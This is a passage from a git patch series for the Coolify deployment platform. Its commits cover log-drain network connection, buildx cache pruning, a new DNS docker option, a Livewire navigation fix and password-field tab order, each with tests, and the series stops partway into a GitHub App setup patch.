+it('persists buildx metadata between the helper container and host cleanup', function () {
+    $sourceFile = file_get_contents(__DIR__.'/../../app/Jobs/ApplicationDeploymentJob.php');
+
+    expect($sourceFile)
+        ->toContain('mkdir -p {$this->serverUserHomeDir}/.docker/buildx')
+        ->toContain('-v {$this->serverUserHomeDir}/.docker/buildx:/root/.docker/buildx');
+
+    expect(substr_count($sourceFile, '{$buildxMetadataVolume} -v /var/run/docker.sock:/var/run/docker.sock'))->toBe(3);
+});

From d87ab279fb098adc05292610af9a9683159a4647 Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Tue, 2 Jun 2026 14:33:57 +0200
Subject: [PATCH 80/90] fix(log-drain): connect drain to service networks

Ensure the log drain container joins enabled service destination networks
when services start or the log drain restarts.
---
 app/Actions/Server/StartLogDrain.php          | 20 ++++
 app/Actions/Service/StartService.php          | 22 +++++
 .../LogDrainNetworkConnectCommandTest.php     | 97 +++++++++++++++++++
 3 files changed, 139 insertions(+)
 create mode 100644 tests/Feature/LogDrain/LogDrainNetworkConnectCommandTest.php

diff --git a/app/Actions/Server/StartLogDrain.php b/app/Actions/Server/StartLogDrain.php
index e4df5a061..eb419992d 100644
--- a/app/Actions/Server/StartLogDrain.php
+++ b/app/Actions/Server/StartLogDrain.php
@@ -3,6 +3,7 @@
 namespace App\Actions\Server;
 
 use App\Models\Server;
+use App\Models\Service;
 use Lorisleiva\Actions\Concerns\AsAction;
 
 class StartLogDrain
@@ -201,10 +202,29 @@ public function handle(Server $server)
                 "echo 'Starting Fluent Bit'",
                 "cd $config_path && docker compose up -d",
             ];
+            $command = array_merge($command, $this->logDrainNetworkConnectCommands($server));
 
             return instant_remote_process($command, $server);
         } catch (\Throwable $e) {
             return handleError($e);
         }
     }
+
+    private function logDrainNetworkConnectCommands(Server $server): array
+    {
+        if (! $server->isLogDrainEnabled()) {
+            return [];
+        }
+
+        return $server->services()
+            ->with('destination')
+            ->where('connect_to_docker_network', true)
+            ->get()
+            ->map(fn (Service $service) => data_get($service, 'destination.network'))
+            ->filter()
+            ->unique()
+            ->map(fn (string $network) => 'docker network connect '.escapeshellarg($network).' coolify-log-drain >/dev/null 2>&1 || true')
+            ->values()
+            ->all();
+    }
 }
diff --git a/app/Actions/Service/StartService.php b/app/Actions/Service/StartService.php
index 89817506d..463a8ad5b 100644
--- a/app/Actions/Service/StartService.php
+++ b/app/Actions/Service/StartService.php
@@ -50,10 +50,32 @@ public function handle(Service $service, bool $pullLatestImages = false, bool $s
                 $commands[] = "docker network connect --alias {$serviceName}-{$service->uuid} {$safeNetwork} {$serviceName}-{$service->uuid} >/dev/null 2>&1 || true";
             }
         }
+        $commands = array_merge($commands, $this->logDrainNetworkConnectCommands($service));
 
         return remote_process($commands, $service->server, type_uuid: $service->uuid, callEventOnFinish: 'ServiceStatusChanged');
     }
 
+    private function logDrainNetworkConnectCommands(Service $service): array
+    {
+        if (! data_get($service, 'connect_to_docker_network')) {
+            return [];
+        }
+
+        if (! $service->destination?->server?->isLogDrainEnabled()) {
+            return [];
+        }
+
+        $network = data_get($service, 'destination.network');
+
+        if (blank($network)) {
+            return [];
+        }
+
+        return [
+            'docker network connect '.escapeshellarg($network).' coolify-log-drain >/dev/null 2>&1 || true',
+        ];
+    }
+
     private function shouldStopBeforeStarting(bool $pullLatestImages, bool $stopBeforeStart): bool
     {
         return $stopBeforeStart && ! $pullLatestImages;
diff --git a/tests/Feature/LogDrain/LogDrainNetworkConnectCommandTest.php b/tests/Feature/LogDrain/LogDrainNetworkConnectCommandTest.php
new file mode 100644
index 000000000..ab3144da3
--- /dev/null
+++ b/tests/Feature/LogDrain/LogDrainNetworkConnectCommandTest.php
@@ -0,0 +1,97 @@
+<?php
+
+use App\Actions\Server\StartLogDrain;
+use App\Actions\Service\StartService;
+use App\Models\Environment;
+use App\Models\Project;
+use App\Models\Server;
+use App\Models\Service;
+use App\Models\StandaloneDocker;
+use App\Models\Team;
+use Illuminate\Foundation\Testing\RefreshDatabase;
+
+uses(RefreshDatabase::class);
+
+function reflectedLogDrainNetworkCommands(object $action, Server|Service $model): array
+{
+    $method = new ReflectionMethod($action, 'logDrainNetworkConnectCommands');
+    $method->setAccessible(true);
+
+    return $method->invoke($action, $model);
+}
+
+function createServerWithTeam(): Server
+{
+    $team = Team::factory()->create();
+
+    return Server::factory()->create(['team_id' => $team->id]);
+}
+
+function createServiceOnServer(Server $server, string $network, bool $connectToDockerNetwork = true): Service
+{
+    $team = Team::factory()->create();
+    $project = Project::factory()->create(['team_id' => $team->id]);
+    $environment = Environment::factory()->create(['project_id' => $project->id]);
+    $destination = StandaloneDocker::query()->firstOrCreate(
+        ['server_id' => $server->id, 'network' => $network],
+        ['uuid' => fake()->uuid(), 'name' => fake()->unique()->word()]
+    );
+
+    return Service::factory()->create([
+        'server_id' => $server->id,
+        'environment_id' => $environment->id,
+        'destination_id' => $destination->id,
+        'destination_type' => StandaloneDocker::class,
+        'connect_to_docker_network' => $connectToDockerNetwork,
+        'docker_compose' => "services:\n  signoz:\n    image: signoz/signoz:latest\n",
+    ]);
+}
+
+it('connects the log drain container to a service preferred network when the server log drain is enabled', function () {
+    $server = createServerWithTeam();
+    $server->settings()->update(['is_logdrain_custom_enabled' => true]);
+    $service = createServiceOnServer($server, 'signoz-net', true);
+
+    $commands = reflectedLogDrainNetworkCommands(new StartService, $service->fresh(['destination.server.settings']));
+
+    expect($commands)->toContain("docker network connect 'signoz-net' coolify-log-drain >/dev/null 2>&1 || true");
+});
+
+it('does not connect the log drain container when service preferred network is disabled', function () {
+    $server = createServerWithTeam();
+    $server->settings()->update(['is_logdrain_custom_enabled' => true]);
+    $service = createServiceOnServer($server, 'signoz-net', false);
+
+    $commands = reflectedLogDrainNetworkCommands(new StartService, $service->fresh(['destination.server.settings']));
+
+    expect($commands)->toBeEmpty();
+});
+
+it('does not connect the log drain container when the server log drain is disabled', function () {
+    $server = createServerWithTeam();
+    $service = createServiceOnServer($server, 'signoz-net', true);
+
+    $commands = reflectedLogDrainNetworkCommands(new StartService, $service->fresh(['destination.server.settings']));
+
+    expect($commands)->toBeEmpty();
+});
+
+it('connects a restarted log drain container to all enabled service preferred networks on the server', function () {
+    $server = createServerWithTeam();
+    $server->settings()->update(['is_logdrain_custom_enabled' => true]);
+    createServiceOnServer($server, 'signoz-net', true);
+    createServiceOnServer($server, 'ignored-net', false);
+    createServiceOnServer($server, 'signoz-net', true);
+
+    $otherServer = createServerWithTeam();
+    createServiceOnServer($otherServer, 'other-server-net', true);
+
+    $commands = reflectedLogDrainNetworkCommands(new StartLogDrain, $server->fresh(['settings']));
+
+    expect($commands)
+        ->toContain("docker network connect 'signoz-net' coolify-log-drain >/dev/null 2>&1 || true")
+        ->not->toContain("docker network connect 'ignored-net' coolify-log-drain >/dev/null 2>&1 || true")
+        ->not->toContain("docker network connect 'other-server-net' coolify-log-drain >/dev/null 2>&1 || true");
+
+    expect($commands)->toHaveCount(1);
+});

From a75dc07567137298771128e56cba4cd0b934cda1 Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Tue, 2 Jun 2026 15:14:01 +0200
Subject: [PATCH 81/90] fix(server): prune Railpack buildx cache via helper
 container

---
 app/Actions/Server/CleanupDocker.php            | 2 +-
 tests/Unit/Actions/Server/CleanupDockerTest.php | 3 ++-
 2 files changed, 3 insertions(+), 2 deletions(-)

diff --git a/app/Actions/Server/CleanupDocker.php b/app/Actions/Server/CleanupDocker.php
index 45514e601..8fc6907af 100644
--- a/app/Actions/Server/CleanupDocker.php
+++ b/app/Actions/Server/CleanupDocker.php
@@ -51,7 +51,7 @@ public function handle(Server $server, bool $deleteUnusedVolumes = false, bool $
             'docker container prune -f --filter "label=coolify.managed=true" --filter "label!=coolify.proxy=true" --filter "label!=coolify.type=database" --filter "label!=coolify.type=application" --filter "label!=coolify.type=service"',
             $imagePruneCmd,
             'docker builder prune -af',
-            'BUILDX_CONFIG=$HOME/.docker/buildx docker buildx prune --builder coolify-railpack -af 2>/dev/null || true',
+            "docker run --rm -v $HOME/.docker/buildx:/root/.docker/buildx -v /var/run/docker.sock:/var/run/docker.sock {$helperImageWithVersion} docker buildx prune --builder coolify-railpack -af 2>/dev/null || true",
             "docker images --filter before=$helperImageWithVersion --filter reference=$helperImage | grep $helperImage | awk '{print $3}' | xargs -r docker rmi -f",
             "docker images --filter before=$realtimeImageWithVersion --filter reference=$realtimeImage | grep $realtimeImage | awk '{print $3}' | xargs -r docker rmi -f",
             "docker images --filter before=$helperImageWithoutPrefixVersion --filter reference=$helperImageWithoutPrefix | grep $helperImageWithoutPrefix | awk '{print $3}' | xargs -r docker rmi -f",
diff --git a/tests/Unit/Actions/Server/CleanupDockerTest.php b/tests/Unit/Actions/Server/CleanupDockerTest.php
index a0439f34f..79f3b92a5 100644
--- a/tests/Unit/Actions/Server/CleanupDockerTest.php
+++ b/tests/Unit/Actions/Server/CleanupDockerTest.php
@@ -451,7 +451,8 @@
     $sourceFile = file_get_contents(__DIR__.'/../../../../app/Actions/Server/CleanupDocker.php');
 
     expect($sourceFile)
-        ->toContain('BUILDX_CONFIG=$HOME/.docker/buildx docker buildx prune --builder coolify-railpack -af')
+        ->toContain('docker run --rm -v $HOME/.docker/buildx:/root/.docker/buildx')
+        ->toContain('docker buildx prune --builder coolify-railpack -af')
         ->not->toContain('--buildkitd-flags');
 });
 

From d681e656c7bb813afc21d589347c948a1cdde832 Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Tue, 2 Jun 2026 16:36:00 +0200
Subject: [PATCH 82/90] fix(server): preserve remote HOME in Railpack buildx
 prune

---
 app/Actions/Server/CleanupDocker.php            | 2 +-
 tests/Unit/Actions/Server/CleanupDockerTest.php | 2 +-
 2 files changed, 2 insertions(+), 2 deletions(-)

diff --git a/app/Actions/Server/CleanupDocker.php b/app/Actions/Server/CleanupDocker.php
index 8fc6907af..06abeb3a6 100644
--- a/app/Actions/Server/CleanupDocker.php
+++ b/app/Actions/Server/CleanupDocker.php
@@ -51,7 +51,7 @@ public function handle(Server $server, bool $deleteUnusedVolumes = false, bool $
             'docker container prune -f --filter "label=coolify.managed=true" --filter "label!=coolify.proxy=true" --filter "label!=coolify.type=database" --filter "label!=coolify.type=application" --filter "label!=coolify.type=service"',
             $imagePruneCmd,
             'docker builder prune -af',
-            "docker run --rm -v $HOME/.docker/buildx:/root/.docker/buildx -v /var/run/docker.sock:/var/run/docker.sock {$helperImageWithVersion} docker buildx prune --builder coolify-railpack -af 2>/dev/null || true",
+            "docker run --rm -v \$HOME/.docker/buildx:/root/.docker/buildx -v /var/run/docker.sock:/var/run/docker.sock {$helperImageWithVersion} docker buildx prune --builder coolify-railpack -af 2>/dev/null || true",
             "docker images --filter before=$helperImageWithVersion --filter reference=$helperImage | grep $helperImage | awk '{print $3}' | xargs -r docker rmi -f",
             "docker images --filter before=$realtimeImageWithVersion --filter reference=$realtimeImage | grep $realtimeImage | awk '{print $3}' | xargs -r docker rmi -f",
             "docker images --filter before=$helperImageWithoutPrefixVersion --filter reference=$helperImageWithoutPrefix | grep $helperImageWithoutPrefix | awk '{print $3}' | xargs -r docker rmi -f",
diff --git a/tests/Unit/Actions/Server/CleanupDockerTest.php b/tests/Unit/Actions/Server/CleanupDockerTest.php
index 79f3b92a5..a70f07d15 100644
--- a/tests/Unit/Actions/Server/CleanupDockerTest.php
+++ b/tests/Unit/Actions/Server/CleanupDockerTest.php
@@ -451,7 +451,7 @@
     $sourceFile = file_get_contents(__DIR__.'/../../../../app/Actions/Server/CleanupDocker.php');
 
     expect($sourceFile)
-        ->toContain('docker run --rm -v $HOME/.docker/buildx:/root/.docker/buildx')
+        ->toContain('docker run --rm -v \\$HOME/.docker/buildx:/root/.docker/buildx')
         ->toContain('docker buildx prune --builder coolify-railpack -af')
         ->not->toContain('--buildkitd-flags');
 });

From 6692ff3e363c41ba01409c985519c3eb87f78c9f Mon Sep 17 00:00:00 2001
From: tikimo <tijam@sportribe.fi>
Date: Tue, 2 Jun 2026 17:46:47 +0300
Subject: [PATCH 83/90] feat: support dns custom docker option

---
 bootstrap/helpers/docker.php                   |  2 ++
 tests/Feature/CommandInjectionSecurityTest.php |  1 +
 tests/Feature/DockerCustomCommandsTest.php     | 18 ++++++++++++++++++
 3 files changed, 21 insertions(+)

diff --git a/bootstrap/helpers/docker.php b/bootstrap/helpers/docker.php
index 5905ed3c1..e97bc3732 100644
--- a/bootstrap/helpers/docker.php
+++ b/bootstrap/helpers/docker.php
@@ -1000,6 +1000,7 @@ function convertDockerRunToCompose(?string $custom_docker_run_options = null)
         '--ulimit',
         '--device',
         '--shm-size',
+        '--dns',
     ]);
     $mapping = collect([
         '--cap-add' => 'cap_add',
@@ -1013,6 +1014,7 @@ function convertDockerRunToCompose(?string $custom_docker_run_options = null)
         '--ip' => 'ip',
         '--ip6' => 'ip6',
         '--shm-size' => 'shm_size',
+        '--dns' => 'dns',
         '--gpus' => 'gpus',
         '--hostname' => 'hostname',
         '--entrypoint' => 'entrypoint',
diff --git a/tests/Feature/CommandInjectionSecurityTest.php b/tests/Feature/CommandInjectionSecurityTest.php
index b327184a4..5fa5c08d2 100644
--- a/tests/Feature/CommandInjectionSecurityTest.php
+++ b/tests/Feature/CommandInjectionSecurityTest.php
@@ -733,6 +733,7 @@
         '--entrypoint "sh -c \'npm start\'"',
         '--entrypoint "sh -c \'php artisan schedule:work\'"',
         '--hostname "my-host"',
+        '--dns 10.0.0.10 --dns=1.1.1.1',
     ]);
 });
 
diff --git a/tests/Feature/DockerCustomCommandsTest.php b/tests/Feature/DockerCustomCommandsTest.php
index 74bff2043..299709ffd 100644
--- a/tests/Feature/DockerCustomCommandsTest.php
+++ b/tests/Feature/DockerCustomCommandsTest.php
@@ -46,6 +46,24 @@
     ]);
 });
 
+test('ConvertDns', function () {
+    $input = '--dns 10.0.0.10 --dns=1.1.1.1';
+    $output = convertDockerRunToCompose($input);
+    expect($output)->toBe([
+        'dns' => ['10.0.0.10', '1.1.1.1'],
+    ]);
+});
+
+test('ConvertDnsWithOtherOptions', function () {
+    $input = '--cap-add=NET_ADMIN --dns 10.0.0.10 --init';
+    $output = convertDockerRunToCompose($input);
+    expect($output)->toBe([
+        'cap_add' => ['NET_ADMIN'],
+        'dns' => ['10.0.0.10'],
+        'init' => true,
+    ]);
+});
+
 test('ConvertPrivilegedAndInit', function () {
     $input = '---privileged --init';
     $output = convertDockerRunToCompose($input);

From 5acf4d9af2f33c163373057b60f1bda642413d67 Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Tue, 2 Jun 2026 17:00:55 +0200
Subject: [PATCH 84/90] fix(navigation): strip stale x-cloak after Livewire
 navigation

Remove leftover x-cloak attributes after wire:navigate events so morphed
pages do not stay hidden, while keeping the initial-load cloak guard covered
by a feature test.
---
 resources/js/app.js                   |  8 ++++++++
 tests/Feature/NavigationCloakTest.php | 16 ++++++++++++++++
 2 files changed, 24 insertions(+)
 create mode 100644 tests/Feature/NavigationCloakTest.php

diff --git a/resources/js/app.js b/resources/js/app.js
index 4dcae5f8e..96085bd96 100644
--- a/resources/js/app.js
+++ b/resources/js/app.js
@@ -1,5 +1,13 @@
 import { initializeTerminalComponent } from './terminal.js';
 
+// Livewire 3.5.19+ re-applies `x-cloak` to morphed elements during wire:navigate
+// (via replaceHtmlAttributes). With `[x-cloak]{display:none}` on the app wrapper,
+// this blanks the whole page on every navigation until Alpine re-processes it.
+// Strip leftover x-cloak after each navigation; the initial-load FOUC guard stays.
+document.addEventListener('livewire:navigated', () => {
+    document.querySelectorAll('[x-cloak]').forEach((el) => el.removeAttribute('x-cloak'));
+});
+
 ['livewire:navigated', 'alpine:init'].forEach((event) => {
     document.addEventListener(event, () => {
         // tree-shaking
diff --git a/tests/Feature/NavigationCloakTest.php b/tests/Feature/NavigationCloakTest.php
new file mode 100644
index 000000000..430400ea7
--- /dev/null
+++ b/tests/Feature/NavigationCloakTest.php
@@ -0,0 +1,16 @@
+<?php
+
+it('strips leftover x-cloak after wire:navigate to prevent blank page', function () {
+    $appJs = file_get_contents(resource_path('js/app.js'));
+
+    expect($appJs)
+        ->toContain("document.addEventListener('livewire:navigated'")
+        ->toContain("querySelectorAll('[x-cloak]')")
+        ->toContain("removeAttribute('x-cloak')");
+});
+
+it('keeps the initial-load x-cloak guard on the app wrapper', function () {
+    $layout = file_get_contents(resource_path('views/layouts/app.blade.php'));
+
+    expect($layout)->toContain('x-cloak');
+});

From a3c80c9778d2c4b744afafb8d88dc47f51c448aa Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Tue, 2 Jun 2026 17:09:14 +0200
Subject: [PATCH 85/90] fix(forms): focus password fields before visibility
 toggles

Render password inputs and textareas before their visibility toggle buttons so tab navigation reaches the editable field first.
---
 .../components/forms/env-var-input.blade.php  | 40 +++++++++----------
 .../views/components/forms/input.blade.php    | 20 +++++-----
 .../views/components/forms/textarea.blade.php | 30 +++++++-------
 .../PasswordVisibilityComponentTest.php       | 18 +++++++++
 4 files changed, 63 insertions(+), 45 deletions(-)

diff --git a/resources/views/components/forms/env-var-input.blade.php b/resources/views/components/forms/env-var-input.blade.php
index f637425c1..976c63b29 100644
--- a/resources/views/components/forms/env-var-input.blade.php
+++ b/resources/views/components/forms/env-var-input.blade.php
@@ -196,26 +196,6 @@
         }"
         @click.outside="showDropdown = false">
 
-        @if ($type === 'password' && $allowToPeak)
-            <button type="button" x-on:click="type = type === 'password' ? 'text' : 'password'"
-                class="flex absolute inset-y-0 right-0 z-10 items-center pr-2 cursor-pointer dark:hover:text-white"
-                aria-label="Toggle password visibility">
-                <svg x-show="type === 'password'" xmlns="http://www.w3.org/2000/svg" class="w-6 h-6" viewBox="0 0 24 24" stroke-width="1.5"
-                    stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
-                    <path stroke="none" d="M0 0h24v24H0z" fill="none" />
-                    <path d="M10 12a2 2 0 1 0 4 0a2 2 0 0 0 -4 0" />
-                    <path d="M21 12c-2.4 4 -5.4 6 -9 6c-3.6 0 -6.6 -2 -9 -6c2.4 -4 5.4 -6 9 -6c3.6 0 6.6 2 9 6" />
-                </svg>
-                <svg x-cloak x-show="type === 'text'" xmlns="http://www.w3.org/2000/svg" class="w-6 h-6" viewBox="0 0 24 24" stroke-width="1.5"
-                    stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
-                    <path stroke="none" d="M0 0h24v24H0z" fill="none" />
-                    <path d="M10.585 10.587a2 2 0 0 0 2.829 2.828" />
-                    <path d="M16.681 16.673a8.717 8.717 0 0 1 -4.681 1.327c-3.6 0 -6.6 -2 -9 -6c1.272 -2.12 2.712 -3.678 4.32 -4.674m2.86 -1.146a9.055 9.055 0 0 1 1.82 -.18c3.6 0 6.6 2 9 6c-.666 1.11 -1.379 2.067 -2.138 2.87" />
-                    <path d="M3 3l18 18" />
-                </svg>
-            </button>
-        @endif
-
         <input
             x-ref="input"
             @input="handleInput()"
@@ -241,6 +221,26 @@ class="flex absolute inset-y-0 right-0 z-10 items-center pr-2 cursor-pointer dar
             placeholder="{{ $attributes->get('placeholder') }}"
             @if ($autofocus) autofocus @endif>
 
+        @if ($type === 'password' && $allowToPeak)
+            <button type="button" x-on:click="type = type === 'password' ? 'text' : 'password'"
+                class="flex absolute inset-y-0 right-0 z-10 items-center pr-2 cursor-pointer dark:hover:text-white"
+                aria-label="Toggle password visibility">
+                <svg x-show="type === 'password'" xmlns="http://www.w3.org/2000/svg" class="w-6 h-6" viewBox="0 0 24 24" stroke-width="1.5"
+                    stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
+                    <path stroke="none" d="M0 0h24v24H0z" fill="none" />
+                    <path d="M10 12a2 2 0 1 0 4 0a2 2 0 0 0 -4 0" />
+                    <path d="M21 12c-2.4 4 -5.4 6 -9 6c-3.6 0 -6.6 -2 -9 -6c2.4 -4 5.4 -6 9 -6c3.6 0 6.6 2 9 6" />
+                </svg>
+                <svg x-cloak x-show="type === 'text'" xmlns="http://www.w3.org/2000/svg" class="w-6 h-6" viewBox="0 0 24 24" stroke-width="1.5"
+                    stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
+                    <path stroke="none" d="M0 0h24v24H0z" fill="none" />
+                    <path d="M10.585 10.587a2 2 0 0 0 2.829 2.828" />
+                    <path d="M16.681 16.673a8.717 8.717 0 0 1 -4.681 1.327c-3.6 0 -6.6 -2 -9 -6c1.272 -2.12 2.712 -3.678 4.32 -4.674m2.86 -1.146a9.055 9.055 0 0 1 1.82 -.18c3.6 0 6.6 2 9 6c-.666 1.11 -1.379 2.067 -2.138 2.87" />
+                    <path d="M3 3l18 18" />
+                </svg>
+            </button>
+        @endif
+
         {{-- Dropdown for suggestions --}}
         <div x-show="showDropdown"
              x-transition
diff --git a/resources/views/components/forms/input.blade.php b/resources/views/components/forms/input.blade.php
index 456aa1da8..c81f53ce9 100644
--- a/resources/views/components/forms/input.blade.php
+++ b/resources/views/components/forms/input.blade.php
@@ -14,6 +14,16 @@
     @endif
     @if ($type === 'password')
         <div class="relative" x-data="{ type: 'password' }" @success.window="type = 'password'">
+            <input autocomplete="{{ $autocomplete }}" value="{{ $value }}"
+                x-bind:type="type"
+                x-bind:class="{ 'truncate': type === 'text' && ! $el.disabled }"
+                {{ $attributes->merge(['class' => $defaultClass]) }} @required($required)
+                @if ($modelBinding !== 'null') wire:model={{ $modelBinding }} wire:dirty.class="[box-shadow:inset_4px_0_0_#6b16ed,inset_0_0_0_2px_#e5e5e5] dark:[box-shadow:inset_4px_0_0_#fcd452,inset_0_0_0_2px_#242424]" @endif
+                wire:loading.attr="disabled"
+                @readonly($readonly) @disabled($disabled) id="{{ $htmlId }}"
+                name="{{ $name }}" placeholder="{{ $attributes->get('placeholder') }}"
+                aria-placeholder="{{ $attributes->get('placeholder') }}"
+                @if ($autofocus) x-ref="autofocusInput" @endif>
             @if ($allowToPeak)
                 <button type="button" x-on:click="type = type === 'password' ? 'text' : 'password'"
                     class="flex absolute inset-y-0 right-0 items-center pr-2 cursor-pointer dark:hover:text-white"
@@ -35,16 +45,6 @@ class="flex absolute inset-y-0 right-0 items-center pr-2 cursor-pointer dark:hov
                     </svg>
                 </button>
             @endif
-            <input autocomplete="{{ $autocomplete }}" value="{{ $value }}"
-                x-bind:type="type"
-                x-bind:class="{ 'truncate': type === 'text' && ! $el.disabled }"
-                {{ $attributes->merge(['class' => $defaultClass]) }} @required($required)
-                @if ($modelBinding !== 'null') wire:model={{ $modelBinding }} wire:dirty.class="[box-shadow:inset_4px_0_0_#6b16ed,inset_0_0_0_2px_#e5e5e5] dark:[box-shadow:inset_4px_0_0_#fcd452,inset_0_0_0_2px_#242424]" @endif
-                wire:loading.attr="disabled"
-                @readonly($readonly) @disabled($disabled) id="{{ $htmlId }}"
-                name="{{ $name }}" placeholder="{{ $attributes->get('placeholder') }}"
-                aria-placeholder="{{ $attributes->get('placeholder') }}"
-                @if ($autofocus) x-ref="autofocusInput" @endif>
 
         </div>
     @else
diff --git a/resources/views/components/forms/textarea.blade.php b/resources/views/components/forms/textarea.blade.php
index 22c89fd72..752e67433 100644
--- a/resources/views/components/forms/textarea.blade.php
+++ b/resources/views/components/forms/textarea.blade.php
@@ -31,6 +31,21 @@ function handleKeydown(e) {
     @else
         @if ($type === 'password')
             <div class="relative" x-data="{ type: 'password' }" @success.window="type = 'password'">
+                <input x-cloak x-show="type === 'password'" value="{{ $value }}"
+                    {{ $attributes->merge(['class' => $defaultClassInput]) }} @required($required)
+                    @if ($modelBinding !== 'null') wire:model={{ $modelBinding }} wire:dirty.class="[box-shadow:inset_4px_0_0_#6b16ed,inset_0_0_0_2px_#e5e5e5] dark:[box-shadow:inset_4px_0_0_#fcd452,inset_0_0_0_2px_#242424]" @endif
+                    wire:loading.attr="disabled"
+                    type="{{ $type }}" @readonly($readonly) @disabled($disabled) id="{{ $htmlId }}"
+                    name="{{ $name }}" placeholder="{{ $attributes->get('placeholder') }}"
+                    aria-placeholder="{{ $attributes->get('placeholder') }}">
+                <textarea minlength="{{ $minlength }}" maxlength="{{ $maxlength }}" x-cloak x-show="type !== 'password'"
+                    placeholder="{{ $placeholder }}" {{ $attributes->merge(['class' => $defaultClass]) }}
+                    @if ($realtimeValidation) wire:model.debounce.200ms="{{ $modelBinding }}" wire:dirty.class="[box-shadow:inset_4px_0_0_#6b16ed,inset_0_0_0_2px_#e5e5e5] dark:[box-shadow:inset_4px_0_0_#fcd452,inset_0_0_0_2px_#242424]"
+                @else
+            wire:model={{ $value ?? $modelBinding }} wire:dirty.class="[box-shadow:inset_4px_0_0_#6b16ed,inset_0_0_0_2px_#e5e5e5] dark:[box-shadow:inset_4px_0_0_#fcd452,inset_0_0_0_2px_#242424]" @endif
+                    @disabled($disabled) @readonly($readonly) @required($required) id="{{ $htmlId }}"
+                    name="{{ $name }}" name={{ $modelBinding }}
+                    @if ($autofocus) x-ref="autofocusInput" @endif></textarea>
                 @if ($allowToPeak)
                     <button type="button" x-on:click="type = type === 'password' ? 'text' : 'password'"
                         class="absolute inset-y-0 right-0 flex items-center h-6 pt-2 pr-2 cursor-pointer dark:hover:text-white"
@@ -51,21 +66,6 @@ class="absolute inset-y-0 right-0 flex items-center h-6 pt-2 pr-2 cursor-pointer
                         </svg>
                     </button>
                 @endif
-                <input x-cloak x-show="type === 'password'" value="{{ $value }}"
-                    {{ $attributes->merge(['class' => $defaultClassInput]) }} @required($required)
-                    @if ($modelBinding !== 'null') wire:model={{ $modelBinding }} wire:dirty.class="[box-shadow:inset_4px_0_0_#6b16ed,inset_0_0_0_2px_#e5e5e5] dark:[box-shadow:inset_4px_0_0_#fcd452,inset_0_0_0_2px_#242424]" @endif
-                    wire:loading.attr="disabled"
-                    type="{{ $type }}" @readonly($readonly) @disabled($disabled) id="{{ $htmlId }}"
-                    name="{{ $name }}" placeholder="{{ $attributes->get('placeholder') }}"
-                    aria-placeholder="{{ $attributes->get('placeholder') }}">
-                <textarea minlength="{{ $minlength }}" maxlength="{{ $maxlength }}" x-cloak x-show="type !== 'password'"
-                    placeholder="{{ $placeholder }}" {{ $attributes->merge(['class' => $defaultClass]) }}
-                    @if ($realtimeValidation) wire:model.debounce.200ms="{{ $modelBinding }}" wire:dirty.class="[box-shadow:inset_4px_0_0_#6b16ed,inset_0_0_0_2px_#e5e5e5] dark:[box-shadow:inset_4px_0_0_#fcd452,inset_0_0_0_2px_#242424]"
-                @else
-            wire:model={{ $value ?? $modelBinding }} wire:dirty.class="[box-shadow:inset_4px_0_0_#6b16ed,inset_0_0_0_2px_#e5e5e5] dark:[box-shadow:inset_4px_0_0_#fcd452,inset_0_0_0_2px_#242424]" @endif
-                    @disabled($disabled) @readonly($readonly) @required($required) id="{{ $htmlId }}"
-                    name="{{ $name }}" name={{ $modelBinding }}
-                    @if ($autofocus) x-ref="autofocusInput" @endif></textarea>
 
             </div>
         @else
diff --git a/tests/Feature/PasswordVisibilityComponentTest.php b/tests/Feature/PasswordVisibilityComponentTest.php
index a5087f5cd..9c3d5d673 100644
--- a/tests/Feature/PasswordVisibilityComponentTest.php
+++ b/tests/Feature/PasswordVisibilityComponentTest.php
@@ -21,6 +21,12 @@
         ->not->toContain('changePasswordFieldType');
 });
 
+it('renders password input before visibility toggle in tab order', function () {
+    $html = Blade::render('<x-forms.input type="password" id="secret" />');
+
+    expect(strpos($html, '<input'))->toBeLessThan(strpos($html, 'aria-label="Toggle password visibility"'));
+});
+
 it('renders password textarea with Alpine-managed visibility state', function () {
     $html = Blade::render('<x-forms.textarea type="password" id="secret" />');
 
@@ -31,6 +37,12 @@
         ->not->toContain('changePasswordFieldType');
 });
 
+it('renders password textarea input before visibility toggle in tab order', function () {
+    $html = Blade::render('<x-forms.textarea type="password" id="secret" />');
+
+    expect(strpos($html, '<input'))->toBeLessThan(strpos($html, 'aria-label="Toggle password visibility"'));
+});
+
 it('renders textarea without monospace classes by default', function () {
     $html = Blade::render('<x-forms.textarea id="notes" />');
 
@@ -53,3 +65,9 @@
         ->toContain("x-on:click=\"type = type === 'password' ? 'text' : 'password'\"")
         ->toContain('x-bind:type="type"');
 });
+
+it('renders env var password input before visibility toggle in tab order', function () {
+    $html = Blade::render('<x-forms.env-var-input type="password" id="secret" />');
+
+    expect(strpos($html, '<input'))->toBeLessThan(strpos($html, 'aria-label="Toggle password visibility"'));
+});

From 858b1906ec34e76950262e18135c0ecc5d22eb15 Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Wed, 3 Jun 2026 09:33:46 +0200
Subject: [PATCH 86/90] Improve GitHub App setup flow

---
 app/Http/Controllers/Webhook/Github.php       |  55 ++++++--
 app/Livewire/Source/Github/Change.php         |   2 +
 bootstrap/helpers/github.php                  |  22 ++--
 .../livewire/source/github/change.blade.php   |   7 +-
 tests/Feature/GithubSourceChangeTest.php      |  99 +++++++++++++++
 .../Security/GithubAppSetupCallbackTest.php   | 119 +++++++++++++++++-
 6 files changed, 276 insertions(+), 28 deletions(-)

diff --git a/app/Http/Controllers/Webhook/Github.php b/app/Http/Controllers/Webhook/Github.php
index 8e3ffcd7c..40c5cbdf0 100644
--- a/app/Http/Controllers/Webhook/Github.php
+++ b/app/Http/Controllers/Webhook/Github.php
@@ -11,6 +11,8 @@
 use App\Models\GithubApp;
 use App\Models\PrivateKey;
 use Exception;
+use Illuminate\Http\Exceptions\HttpResponseException;
